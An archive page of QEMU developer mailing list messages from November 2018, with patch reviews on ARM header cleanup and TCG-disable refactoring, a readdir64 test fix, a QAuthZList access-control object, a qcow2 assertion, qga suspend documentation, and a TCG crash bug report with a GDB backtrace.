On 13 November 2018 at 18:02, Philippe Mathieu-Daudé  wrote:
> On 13/11/18 18:01, Peter Maydell wrote:
>>
>> On 13 November 2018 at 16:52, Samuel Ortiz  wrote:

>>> --- a/target/arm/helper.c
>>> +++ b/target/arm/helper.c
>>> @@ -12,13 +12,10 @@
>>>   #include "internals.h"
>>>   #include "exec/gdbstub.h"
>>>   #include "exec/helper-proto.h"
>>> -#include "qemu/host-utils.h"
>>
>>
>> This is for muldiv64().
>
>
> But it is already included by "cpu.h" -> "exec/cpu-defs.h"

> So they are not "unused" but "unnecessary".
>
> I thought this would be better to clean this once, before Samuel split.

Generally I think that if a .c file directly uses function X declared in
header Y it should #include Y, even if it happens that it already includes
other header Z that includes Y. Otherwise if we refactor Z later such
that it no longer needs to include Y, it will break compilation of the .c
file. (That is, Z including Y is a detail of the implementation of Z,
not a guarantee made by Z to its users.)

The exception here is where the header guarantees that it's going
to include certain other things (which is the case for eg our osdep.h).

thanks
-- PMM



Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

2018-11-13 Thread Philippe Mathieu-Daudé
On Tue, Nov 13, 2018 at 7:08 PM Peter Maydell  wrote:
> On 13 November 2018 at 18:02, Philippe Mathieu-Daudé  
> wrote:
> > On 13/11/18 18:01, Peter Maydell wrote:
> >> On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
>
> >>> --- a/target/arm/helper.c
> >>> +++ b/target/arm/helper.c
> >>> @@ -12,13 +12,10 @@
> >>>   #include "internals.h"
> >>>   #include "exec/gdbstub.h"
> >>>   #include "exec/helper-proto.h"
> >>> -#include "qemu/host-utils.h"
> >>
> >>
> >> This is for muldiv64().
> >
> >
> > But it is already included by "cpu.h" -> "exec/cpu-defs.h"
>
> > So they are not "unused" but "unnecessary".
> >
> > I thought this would be better to clean this once, before Samuel split.
>
> Generally I think that if a .c file directly uses function X declared in
> header Y it should #include Y, even if it happens that it already includes
> other header Z that includes Y. Otherwise if we refactor Z later such
> that it no longer needs to include Y, it will break compilation of the .c
> file. (That is, Z including Y is a detail of the implementation of Z,
> not a guarantee made by Z to its users.)

Yes, this makes sense now, thanks.

Phil.

> The exception here is where the header guarantees that it's going
> to include certain other things (which is the case for eg our osdep.h).
>
> thanks
> -- PMM



[Qemu-devel] [PATCH] tests/tcg/multiarch: fix 32bit linux-test on 64bit host

2018-11-13 Thread Laurent Vivier
Fix:

  TESTlinux-test on i386
  .../tests/tcg/multiarch/linux-test.c:201: readdir

readdir() calls getdents64() to obtain the list of entries in a
directory, and getdents64() can return 64-bit d_off values (with ext4,
for instance) that will not fit in the 32-bit d_off field of the
readdir() dirent structure.

To avoid that, use readdir64() to use a 64bit d_off field too.

Signed-off-by: Laurent Vivier 
---
 tests/tcg/multiarch/linux-test.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/tcg/multiarch/linux-test.c b/tests/tcg/multiarch/linux-test.c
index e80eccc0ce..fa4243fc04 100644
--- a/tests/tcg/multiarch/linux-test.c
+++ b/tests/tcg/multiarch/linux-test.c
@@ -83,7 +83,7 @@ static void test_file(void)
 struct utimbuf tbuf;
 struct iovec vecs[2];
 DIR *dir;
-struct dirent *de;
+struct dirent64 *de;
 /* TODO: make common tempdir creation for tcg tests */
 char template[] = "/tmp/linux-test-XX";
 char *tmpdir = mkdtemp(template);
@@ -186,7 +186,7 @@ static void test_file(void)
 error("opendir");
 len = 0;
 for(;;) {
-de = readdir(dir);
+de = readdir64(dir);
 if (!de)
 break;
 if (strcmp(de->d_name, ".") != 0 &&
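Review bot: `readdir64()` and `struct dirent64` are glibc's LFS transitional interfaces, only declared when `_LARGEFILE64_SOURCE` (or `_GNU_SOURCE`) is defined; the hunk does not show the feature macros or the build flags, so if the test is compiled with strict-standard flags the call will be implicitly declared or fail to compile. An alternative that keeps the portable API is building the test with `-D_FILE_OFFSET_BITS=64`, which redirects `readdir()`/`struct dirent` to the 64-bit variants on 32-bit glibc targets. Either way, a one-line comment at the declaration, e.g. `/* getdents64 can return d_off values that overflow a 32-bit dirent */`, would save the next reader a trip to the commit log. test_file() starts and ends outside the hunk.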
-- 
2.17.2




Re: [Qemu-devel] [PATCH v6 08/11] authz: add QAuthZList object type for an access control list

2018-11-13 Thread Daniel P . Berrangé
On Thu, Nov 08, 2018 at 02:23:43AM +0400, Marc-André Lureau wrote:
> Hi
> 
> On Fri, Oct 19, 2018 at 5:45 PM Daniel P. Berrangé  wrote
> > ---
> >  Makefile|   7 +-
> >  Makefile.objs   |   4 +
> >  qapi/authz.json |  58 
> >  qapi/qapi-schema.json   |   1 +
> >  include/authz/list.h| 106 ++
> >  authz/list.c| 309 
> >  tests/test-authz-list.c | 171 ++
> >  .gitignore  |   4 +
> >  MAINTAINERS |   1 +
> >  authz/Makefile.objs |   1 +
> >  authz/trace-events  |   4 +
> >  tests/Makefile.include  |   4 +
> >  12 files changed, 669 insertions(+), 1 deletion(-)
> >  create mode 100644 qapi/authz.json
> >  create mode 100644 include/authz/list.h
> >  create mode 100644 authz/list.c
> >  create mode 100644 tests/test-authz-list.c
> >

> > diff --git a/qapi/authz.json b/qapi/authz.json
> > new file mode 100644
> > index 00..607839c627
> > --- /dev/null
> > +++ b/qapi/authz.json
> > @@ -0,0 +1,58 @@
> > +# -*- Mode: Python -*-
> > +#
> > +# QAPI authz definitions
> > +
> > +##
> > +# @QAuthZListPolicy:
> > +#
> > +# The authorization policy result
> > +#
> > +# @deny: deny access
> > +# @allow: allow access
> > +#
> > +# Since: 3.0
> 
> obviously, you'll have to update to 3.2

4.0 in fact since we bump at the start of each year


> > +##
> > +# @QAuthZListRuleListHack:
> > +#
> > +# Not exposed via QMP; hack to generate QAuthZListRuleList
> > +# for use internally by the code.
> 
> Well, this will probably end in the documentation (it's already in the
> .json, which is one source of documentation ;).
> 
> What about adding a 'gen-list' field, or a 'pragma' listing the
> structs that should have list code generated?

I'll leave that for future motivated contributors, as I'm just
following pre-existing best practice here.


> > +static bool qauthz_list_is_allowed(QAuthZ *authz,
> > +   const char *identity,
> > +   Error **errp)
> > +{
> > +QAuthZList *lauthz = QAUTHZ_LIST(authz);
> > +QAuthZListRuleList *rules = lauthz->rules;
> > +
> > +while (rules) {
> > +QAuthZListRule *rule = rules->value;
> > +QAuthZListFormat format = rule->has_format ? rule->format :
> > +QAUTHZ_LIST_FORMAT_EXACT;
> > +
> > +trace_qauthz_list_check_rule(authz, rule->match, identity,
> > + format, rule->policy);
> > +switch (format) {
> > +case QAUTHZ_LIST_FORMAT_EXACT:
> > +if (strcmp(rule->match, identity) == 0) {
> 
> g_str_equal() ?

Yes.

> 
> > +return rule->policy == QAUTHZ_LIST_POLICY_ALLOW;
> > +}
> > +break;
> > +#ifdef CONFIG_FNMATCH
> > +case QAUTHZ_LIST_FORMAT_GLOB:
> > +if (fnmatch(rule->match, identity, 0) == 0) {
> 
> Would GPatternSpec be a good alternative?

Excellent, I didn't know about it

> > +return rule->policy == QAUTHZ_LIST_POLICY_ALLOW;
> > +}
> > +break;
> > +#else
> > +return false;
> > +#endif
> > +default:
> 
> 
> No g_warn_if_reached()? Then perhaps add a comment explaining why.

I guess we could.

> > +ssize_t qauthz_list_delete_rule(QAuthZList *auth, const char *match)
> > +{
> > +QAuthZListRule *rule;
> > +QAuthZListRuleList *rules, *prev;
> > +size_t i = 0;
> > +
> > +prev = NULL;
> > +rules = auth->rules;
> > +while (rules) {
> > +rule = rules->value;
> > +if (g_str_equal(rule->match, match)) {
> > +if (prev) {
> > +prev->next = rules->next;
> > +} else {
> > +auth->rules = rules->next;
> > +}
> > +rules->next = NULL;
> > +qapi_free_QAuthZListRuleList(rules);
> > +return i;
> 
> What's the point in returning the old index? Maybe true/false along
> with an Error would be more convenient?

It is required for the conversion of the existing acl_remove API
in the HMP monitor.


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|



Re: [Qemu-devel] [for 3.1? PATCH] qcow2: Assert that refcount block offsets fit in the refcount table

2018-11-13 Thread Eric Blake

On 11/13/18 10:45 AM, Alberto Garcia wrote:

Refcount table entries have a field to store the offset of the
refcount block. The rest of the bits of the entry are currently
reserved.

The offset is always taken from the entry using REFT_OFFSET_MASK to
ensure that we only use the bits that belong to that field.

While that mask is used every time we read from the refcount table, it
is never used when we write to it. Due to the other constraints of the
qcow2 format QEMU can never produce refcount block offsets that don't
fit in that field so any such offset when allocating a refcount block
would indicate a bug in QEMU.
---
  block/qcow2-refcount.c | 3 +++
  1 file changed, 3 insertions(+)



Reviewed-by: Eric Blake 

--
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3266
Virtualization:  qemu.org | libvirt.org



[Qemu-devel] [Bug 1803160] [NEW] qemu-3.1.0-rc0: tcg.c crash in temp_load

2018-11-13 Thread Alberto Ortega
Public bug reported:

QEMU version:
-

qemu-3.1.0-rc0 compiled from sources (earlier versions also affected)

Summary:


TCG crashes in i386 and x86_64 when it tries to execute some specific
illegal instructions. When running full OS emulation, both the guest
system and QEMU crash.

The issue has been reproduced in two scenarios:

Ubuntu x64 host running Debian x86 guest with the following command
line: qemu-system-x86_64 -m 4G debian.qcow

When the attached ELF file is executed inside the guest, QEMU crashes.

It can also be reproduced from the command line:

$ qemu-i386 tcg_crash.elf
/home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863: tcg fatal error
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
zsh: segmentation fault (core dumped)  
../qemu-3.1.0-rc0/build/i386-linux-user/qemu-i386 tcg_crash.elf

GDB backtrace:

(gdb) bt
#0  0x60206488 in raise ()
#1  0x60206b8a in abort ()
#2  0x60007016 in temp_load (s=s@entry=0x607a2780 , 
ts=ts@entry=0x607a3178 , desired_regs=, 
allocated_regs=allocated_regs@entry=16400)
at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863
#3  0x6000a4d9 in tcg_reg_alloc_op (op=0x62808c20, s=) 
at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:3070
#4  tcg_gen_code (s=, tb=tb@entry=0x607ac040 
) at 
/home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:3598
#5  0x6003ef9a in tb_gen_code (cpu=cpu@entry=0x627e0010, 
pc=pc@entry=134512724, cs_base=cs_base@entry=0, flags=flags@entry=4194483, 
cflags=cflags@entry=0)
at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/translate-all.c:1752
#6  0x6003d979 in tb_find (cf_mask=0, tb_exit=0, last_tb=0x0, cpu=0x0) 
at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/cpu-exec.c:404
#7  cpu_exec (cpu=cpu@entry=0x627e0010) at 
/home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/cpu-exec.c:724
#8  0x6006e1a0 in cpu_loop (env=env@entry=0x627e82c0) at 
/home/alberto/Documents/qemu-3.1.0-rc0/linux-user/i386/cpu_loop.c:93
#9  0x600037c5 in main (argc=2, argv=0x7fffdd28, envp=) at /home/alberto/Documents/qemu-3.1.0-rc0/linux-user/main.c:819
(gdb)

Testcase:
-

Find ELF file attached.

** Affects: qemu
 Importance: Undecided
 Status: New

** Attachment added: "tcg_crash.elf"
   
https://bugs.launchpad.net/bugs/1803160/+attachment/5212335/+files/tcg_crash.elf

** Description changed:

  QEMU version:
  -
  
  qemu-3.1.0-rc0 compiled from sources (earlier versions also affected)
  
  Summary:
  
  
  TCG crashes in i386 and x86_64 when it tries to execute some specific
  illegal instructions. When running full OS emulation, both the guest
  system and QEMU crash.
  
  The issue has been reproduced in two scenarios:
  
  Ubuntu x64 host running Debian x86 guest with the following command
  line: qemu-system-x86_64 -m 4G debian.qcow
  
  When the attached ELF file is executed inside the guest, QEMU crashes.
  
  It can also be reproduced from the command line:
  
  $ qemu-i386 tcg_crash.elf
  /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863: tcg fatal error
  qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  zsh: segmentation fault (core dumped)  
../qemu-3.1.0-rc0/build/i386-linux-user/qemu-i386 tcg_crash.elf
  
  GDB backtrace:
  
  (gdb) bt
  #0  0x60206488 in raise ()
  #1  0x60206b8a in abort ()
  #2  0x60007016 in temp_load (s=s@entry=0x607a2780 , 
ts=ts@entry=0x607a3178 , desired_regs=, 
allocated_regs=allocated_regs@entry=16400)
- at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863
+ at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:2863
  #3  0x6000a4d9 in tcg_reg_alloc_op (op=0x62808c20, s=) 
at /home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:3070
  #4  tcg_gen_code (s=, tb=tb@entry=0x607ac040 
) at 
/home/alberto/Documents/qemu-3.1.0-rc0/tcg/tcg.c:3598
  #5  0x6003ef9a in tb_gen_code (cpu=cpu@entry=0x627e0010, 
pc=pc@entry=134512724, cs_base=cs_base@entry=0, flags=flags@entry=4194483, 
cflags=cflags@entry=0)
- at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/translate-all.c:1752
+ at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/translate-all.c:1752
  #6  0x6003d979 in tb_find (cf_mask=0, tb_exit=0, last_tb=0x0, 
cpu=0x0) at /home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/cpu-exec.c:404
  #7  cpu_exec (cpu=cpu@entry=0x627e0010) at 
/home/alberto/Documents/qemu-3.1.0-rc0/accel/tcg/cpu-exec.c:724
  #8  0x6006e1a0 in cpu_loop (env=env@entry=0x627e82c0) at 
/home/alberto/Documents/qemu-3.1.0-rc0/linux-user/i386/cpu_loop.c:93
  #9  0x600037c5 in main (argc=2, argv=0x7fffdd28, envp=) at /home/alberto/Documents/qemu-3.1.0-rc0/linux-user/main.c:819
  (gdb)
  
  Testcase:
  -
  
- Find ELF file attached, and also in the following hexdump:
- 
- $ hexdump -C tcg_crash.elf
-   7f 45 4c 46 01 01 01 00  00 00 00 00 00 00 00 00  |.ELF|
- 0010  02 00 03 

Re: [Qemu-devel] [PATCH 1/1] qga: update docs with systemd suspend support info

2018-11-13 Thread Daniel Henrique Barboza




On 11/13/18 2:39 PM, Daniel Henrique Barboza wrote:



On 11/13/18 2:32 PM, Eric Blake wrote:

On 11/13/18 10:09 AM, Daniel Henrique Barboza wrote:

Commit 067927d62e ("qga: systemd hibernate/suspend/hybrid-sleep
support") failed to update qapi-schema.json after adding systemd
hibernate/suspend/hybrid-sleep capabilities to guest-suspend-* QGA
commands.

Signed-off-by: Daniel Henrique Barboza 
---
  qga/qapi-schema.json | 37 ++---
  1 file changed, 26 insertions(+), 11 deletions(-)



+++ b/qga/qapi-schema.json
@@ -532,12 +532,16 @@
  #
  # Suspend guest to disk.
  #
-# This command tries to execute the scripts provided by the 
pm-utils package.
-# If it's not available, the suspend operation will be performed by 
manually

-# writing to a sysfs file.
+# This command attempts to suspend the guest using three 
strategies, in this

+# order:
  #
-# For the best results it's strongly recommended to have the pm-utils
-# package installed in the guest.
+# - systemd hibernate
+# - pm-utils (via pm-hibernate)
+# - manual write into sysfs
+#
+# If the guest does not have systemd hibernate support, the scripts 
in pm-utils
+# package are executed, in case pm-utils is available. Manual write 
in sysfs

+# is a last resort.


Does this paragraph add any information compared to the earlier list?


Perhaps we can remove the paragraph and add "if available" remarks in 
the listing?

Like:

+# - systemd hibernate, if supported
+# - pm-utils (via pm-hibernate), if pm-utils is installed
+# - manual write into sysfs as a last resort

Same for the other 2 cases below.


Actually, nevermind. Removing the extra paragraph and keeping the list as is
seems cleaner. One can easily assume that, in the lack of guest support of
systemd hibernate, the command will try the next option. Same thing
with pm-utils.






  #
  # This command does NOT return a response on success. There is a 
high chance
  # the command succeeded if the VM exits with a zero exit status 
or, when

@@ -560,12 +564,16 @@
  #
  # Suspend guest to ram.
  #
-# This command tries to execute the scripts provided by the 
pm-utils package.
-# If it's not available, the suspend operation will be performed by 
manually

-# writing to a sysfs file.
+# This command attempts to suspend the guest using three 
strategies, in this

+# order:
+#
+# - systemd suspend
+# - pm-utils (via pm-suspend)
+# - manual write into sysfs
  #
-# For the best results it's strongly recommended to have the pm-utils
-# package installed in the guest.
+# If the guest does not have systemd suspend support, the scripts 
in pm-utils
+# package are executed, in case pm-utils is available. Manual write 
in sysfs

+# is a last resort.


Likewise.


  #
  # IMPORTANT: guest-suspend-ram requires QEMU to support the 
'system_wakeup'
  # command.  Thus, it's *required* to query QEMU for the presence 
of the

@@ -592,7 +600,14 @@
  #
  # Save guest state to disk and suspend to ram.
  #
-# This command requires the pm-utils package to be installed in the 
guest.
+# This command attempts to suspend the guest using three 
strategies, in this

+# order:
+#
+# - systemd hybrid-sleep
+# - pm-utils (via pm-suspend-hybrid)
+#
+# If the guest does not have systemd hybrid-sleep support, the 
scripts in

+# pm-utils package are executed, in case pm-utils is available.


"using three strategies" but a list of only 2 seems odd.



Copy/paste busted!





[Qemu-devel] [PATCH 00/13] Support disabling TCG on ARM

2018-11-13 Thread Samuel Ortiz
This patchset allows for building and running ARM targets with TCG
disabled. It splits the target/arm/helper.c file into logical TCG and
non TCG dependent files so that one can build and run QEMU binaries with
or without TCG enabled.

The rationale behind this work comes from the NEMU project where we're
trying to only support x86 and ARM 64-bit architectures, without
including the TCG code base. We can only do so if we can build and run
ARM binaries with TCG disabled.

The patches are also available here:
https://github.com/intel/nemu/tree/topic/upstream/arm-tcg-disable

Philippe Mathieu-Daudé (2):
  target: arm: Add copyright boilerplate
  target: arm: Remove unused headers

Samuel Ortiz (11):
  target: arm: Move all v7m helpers into their own file
  target: arm: Move all interrupt and exception handlers into their own
file
  target: arm: Move the DC ZVA helper into op_helper
  target: arm: Make ARM TLB filling routine static
  target: arm: Remove the LDST headers
  target: arm: Move all VFP helpers into their own file
  target: arm: Move CPU state dumping routines to helper.c
  target: arm: Move watchpoints APIs to helper.c
  target: arm: Define TCG dependent functions when TCG is enabled
  target: arm: Makefile cleanup
  target: arm: Do not build TCG objects when TCG is off

 target/arm/internals.h |   60 +-
 target/arm/translate.h |7 -
 target/arm/cpu.c   |8 +-
 target/arm/excp_helper.c   |  550 +++
 target/arm/helper.c| 8467 
 target/arm/m_helper.c  | 1892 
 target/arm/op_helper.c |  326 +-
 target/arm/translate-a64.c |  125 -
 target/arm/translate.c |   87 -
 target/arm/vfp_helper.c|  893 
 target/arm/Makefile.objs   |   19 +-
 11 files changed, 6262 insertions(+), 6172 deletions(-)
 create mode 100644 target/arm/excp_helper.c
 create mode 100644 target/arm/m_helper.c
 create mode 100644 target/arm/vfp_helper.c

-- 
2.19.1




Re: [Qemu-devel] [PATCH v6 07/11] authz: add QAuthZSimple object type for easy whitelist auth checks

2018-11-13 Thread Daniel P . Berrangé
On Thu, Nov 08, 2018 at 02:23:48AM +0400, Marc-André Lureau wrote:
> On Fri, Oct 19, 2018 at 5:49 PM Daniel P. Berrangé  
> wrote:
> >
> > In many cases a single VM will just need to whilelist a single identity
> > as the allowed user of network services. This is especially the case for
> > TLS live migration (optionally with NBD storage) where we just need to
> > whitelist the x509 certificate distinguished name of the source QEMU
> > host.
> >
> > Via QMP this can be configured with:
> >
> >   {
> > "execute": "object-add",
> > "arguments": {
> >   "qom-type": "authz-simple",
> >   "id": "authz0",
> >   "parameters": {
> > "identity": "fred"
> >   }
> > }
> >   }
> >
> > Or via the command line
> >
> >   -object authz-simple,id=authz0,identity=fred
> >
> > Signed-off-by: Daniel P. Berrange 
> 
> Reviewed-by: Marc-André Lureau 
> 
> (a test would be trivial)

Yes, will add one


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|



[Qemu-devel] [PATCH 07/13] target: arm: Remove the LDST headers

2018-11-13 Thread Samuel Ortiz
They are no longer needed.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/helper.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 689879c23a..dcb689bfbb 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -16,7 +16,6 @@
 #include "sysemu/sysemu.h"
 #include "qemu/crc32c.h"
 #include "exec/exec-all.h"
-#include "arm_ldst.h"
 #include  /* For crc32 */
 #include "exec/semihost.h"
 #include "sysemu/kvm.h"
-- 
2.19.1




[Qemu-devel] [PATCH 12/13] target: arm: Makefile cleanup

2018-11-13 Thread Samuel Ortiz
Group objects with the same build dependencies together.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/Makefile.objs | 15 +++
 1 file changed, 7 insertions(+), 8 deletions(-)

diff --git a/target/arm/Makefile.objs b/target/arm/Makefile.objs
index 6e880df727..8e513748e3 100644
--- a/target/arm/Makefile.objs
+++ b/target/arm/Makefile.objs
@@ -1,15 +1,13 @@
-obj-y += arm-semi.o
-obj-$(CONFIG_SOFTMMU) += machine.o psci.o arch_dump.o monitor.o
+obj-y += arm-semi.o crypto_helper.o gdbstub.o helper.o cpu.o
+obj-y += translate.o op_helper.o neon_helper.o
+obj-y += iwmmxt_helper.o vec_helper.o m_helper.o
+obj-y += excp_helper.o vfp_helper.o
+
+obj-$(CONFIG_SOFTMMU) += machine.o psci.o arch_dump.o monitor.o arm-powerctl.o
 obj-$(CONFIG_KVM) += kvm.o
 obj-$(call land,$(CONFIG_KVM),$(call lnot,$(TARGET_AARCH64))) += kvm32.o
 obj-$(call land,$(CONFIG_KVM),$(TARGET_AARCH64)) += kvm64.o
 obj-$(call lnot,$(CONFIG_KVM)) += kvm-stub.o
-obj-y += translate.o op_helper.o helper.o cpu.o
-obj-y += neon_helper.o iwmmxt_helper.o vec_helper.o
-obj-y += gdbstub.o m_helper.o excp_helper.o vfp_helper.o
-obj-$(TARGET_AARCH64) += cpu64.o translate-a64.o helper-a64.o gdbstub64.o
-obj-y += crypto_helper.o
-obj-$(CONFIG_SOFTMMU) += arm-powerctl.o
 
 DECODETREE = $(SRC_PATH)/scripts/decodetree.py
 
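Review bot: The new `obj-y` lines at the top mix objects that exist regardless of accelerator (`arm-semi.o gdbstub.o helper.o cpu.o`) with the translator and its helpers (`translate.o op_helper.o neon_helper.o iwmmxt_helper.o vec_helper.o` and the newly split `m_helper.o excp_helper.o vfp_helper.o`), even though the commit message's goal is grouping by build dependency and the cover letter's last patch is "Do not build TCG objects when TCG is off". Keeping the TCG-dependent objects on their own `obj-y +=` lines here — presumably translate.o and the *_helper.o files, exactly which is for that later patch to decide — would let it become a one-token `obj-y` to `obj-$(CONFIG_TCG)` change instead of another reorder. As written, `crypto_helper.o` also sits on the first line next to cpu.o while the other helpers follow on the next lines; if it is TCG-only it belongs with them.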
@@ -20,3 +18,4 @@ target/arm/decode-sve.inc.c: 
$(SRC_PATH)/target/arm/sve.decode $(DECODETREE)
 
 target/arm/translate-sve.o: target/arm/decode-sve.inc.c
 obj-$(TARGET_AARCH64) += translate-sve.o sve_helper.o
+obj-$(TARGET_AARCH64) += cpu64.o translate-a64.o helper-a64.o gdbstub64.o
-- 
2.19.1




[Qemu-devel] [PATCH 05/13] target: arm: Move the DC ZVA helper into op_helper

2018-11-13 Thread Samuel Ortiz
Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/helper.c| 84 --
 target/arm/op_helper.c | 84 ++
 2 files changed, 84 insertions(+), 84 deletions(-)

diff --git a/target/arm/helper.c b/target/arm/helper.c
index 7b30a4cb49..bc2c8cdb67 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -8917,90 +8917,6 @@ hwaddr arm_cpu_get_phys_page_attrs_debug(CPUState *cs, 
vaddr addr,
 
 #endif
 
-void HELPER(dc_zva)(CPUARMState *env, uint64_t vaddr_in)
-{
-/* Implement DC ZVA, which zeroes a fixed-length block of memory.
- * Note that we do not implement the (architecturally mandated)
- * alignment fault for attempts to use this on Device memory
- * (which matches the usual QEMU behaviour of not implementing either
- * alignment faults or any memory attribute handling).
- */
-
-ARMCPU *cpu = arm_env_get_cpu(env);
-uint64_t blocklen = 4 << cpu->dcz_blocksize;
-uint64_t vaddr = vaddr_in & ~(blocklen - 1);
-
-#ifndef CONFIG_USER_ONLY
-{
-/* Slightly awkwardly, QEMU's TARGET_PAGE_SIZE may be less than
- * the block size so we might have to do more than one TLB lookup.
- * We know that in fact for any v8 CPU the page size is at least 4K
- * and the block size must be 2K or less, but TARGET_PAGE_SIZE is only
- * 1K as an artefact of legacy v5 subpage support being present in the
- * same QEMU executable.
- */
-int maxidx = DIV_ROUND_UP(blocklen, TARGET_PAGE_SIZE);
-void *hostaddr[maxidx];
-int try, i;
-unsigned mmu_idx = cpu_mmu_index(env, false);
-TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx);
-
-for (try = 0; try < 2; try++) {
-
-for (i = 0; i < maxidx; i++) {
-hostaddr[i] = tlb_vaddr_to_host(env,
-vaddr + TARGET_PAGE_SIZE * i,
-1, mmu_idx);
-if (!hostaddr[i]) {
-break;
-}
-}
-if (i == maxidx) {
-/* If it's all in the TLB it's fair game for just writing to;
- * we know we don't need to update dirty status, etc.
- */
-for (i = 0; i < maxidx - 1; i++) {
-memset(hostaddr[i], 0, TARGET_PAGE_SIZE);
-}
-memset(hostaddr[i], 0, blocklen - (i * TARGET_PAGE_SIZE));
-return;
-}
-/* OK, try a store and see if we can populate the tlb. This
- * might cause an exception if the memory isn't writable,
- * in which case we will longjmp out of here. We must for
- * this purpose use the actual register value passed to us
- * so that we get the fault address right.
- */
-helper_ret_stb_mmu(env, vaddr_in, 0, oi, GETPC());
-/* Now we can populate the other TLB entries, if any */
-for (i = 0; i < maxidx; i++) {
-uint64_t va = vaddr + TARGET_PAGE_SIZE * i;
-if (va != (vaddr_in & TARGET_PAGE_MASK)) {
-helper_ret_stb_mmu(env, va, 0, oi, GETPC());
-}
-}
-}
-
-/* Slow path (probably attempt to do this to an I/O device or
- * similar, or clearing of a block of code we have translations
- * cached for). Just do a series of byte writes as the architecture
- * demands. It's not worth trying to use a cpu_physical_memory_map(),
- * memset(), unmap() sequence here because:
- *  + we'd need to account for the blocksize being larger than a page
- *  + the direct-RAM access case is almost always going to be dealt
- *with in the fastpath code above, so there's no speed benefit
- *  + we would have to deal with the map returning NULL because the
- *bounce buffer was in use
- */
-for (i = 0; i < blocklen; i++) {
-helper_ret_stb_mmu(env, vaddr + i, 0, oi, GETPC());
-}
-}
-#else
-memset(g2h(vaddr), 0, blocklen);
-#endif
-}
-
 /* Note that signed overflow is undefined in C.  The following routines are
careful to use unsigned types where modulo arithmetic is required.
Failure to do so _will_ break on newer gcc.  */
diff --git a/target/arm/op_helper.c b/target/arm/op_helper.c
index eb6fb82fb8..44a74cb296 100644
--- a/target/arm/op_helper.c
+++ b/target/arm/op_helper.c
@@ -1480,3 +1480,87 @@ uint32_t HELPER(ror_cc)(CPUARMState *env, uint32_t x, 
uint32_t i)
 return ((uint32_t)x >> shift) | (x << (32 - shift));
 }
 }
+
+void HELPER(dc_zva)(CPUARMState *env, uint64_t vaddr_in)
+{
+/* Implement DC ZVA, which zeroes a fixed-length block of memory.
+ * 

[Qemu-devel] [PATCH 06/13] target: arm: Make ARM TLB filling routine static

2018-11-13 Thread Samuel Ortiz
It's only used in op_helper.c, so it does not need to be exported;
moreover it should only be built when TCG is enabled.

Signed-off-by: Samuel Ortiz 
Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 
Reviewed-by: Robert Bradford 
---
 target/arm/internals.h |  5 -
 target/arm/helper.c| 37 -
 target/arm/op_helper.c | 38 ++
 3 files changed, 38 insertions(+), 42 deletions(-)

diff --git a/target/arm/internals.h b/target/arm/internals.h
index ffb5091b1f..06439467d2 100644
--- a/target/arm/internals.h
+++ b/target/arm/internals.h
@@ -741,11 +741,6 @@ static inline bool arm_extabort_type(MemTxResult result)
 return result != MEMTX_DECODE_ERROR;
 }
 
-/* Do a page table walk and add page to TLB if possible */
-bool arm_tlb_fill(CPUState *cpu, vaddr address,
-  MMUAccessType access_type, int mmu_idx,
-  ARMMMUFaultInfo *fi);
-
 /* Return true if the stage 1 translation regime is using LPAE format page
  * tables */
 bool arm_s1_regime_using_lpae_format(CPUARMState *env, ARMMMUIdx mmu_idx);
diff --git a/target/arm/helper.c b/target/arm/helper.c
index bc2c8cdb67..689879c23a 100644
--- a/target/arm/helper.c
+++ b/target/arm/helper.c
@@ -8855,43 +8855,6 @@ bool get_phys_addr(CPUARMState *env, target_ulong 
address,
 }
 }
 
-/* Walk the page table and (if the mapping exists) add the page
- * to the TLB. Return false on success, or true on failure. Populate
- * fsr with ARM DFSR/IFSR fault register format value on failure.
- */
-bool arm_tlb_fill(CPUState *cs, vaddr address,
-  MMUAccessType access_type, int mmu_idx,
-  ARMMMUFaultInfo *fi)
-{
-ARMCPU *cpu = ARM_CPU(cs);
-CPUARMState *env = >env;
-hwaddr phys_addr;
-target_ulong page_size;
-int prot;
-int ret;
-MemTxAttrs attrs = {};
-
-ret = get_phys_addr(env, address, access_type,
-core_to_arm_mmu_idx(env, mmu_idx), _addr,
-, , _size, fi, NULL);
-if (!ret) {
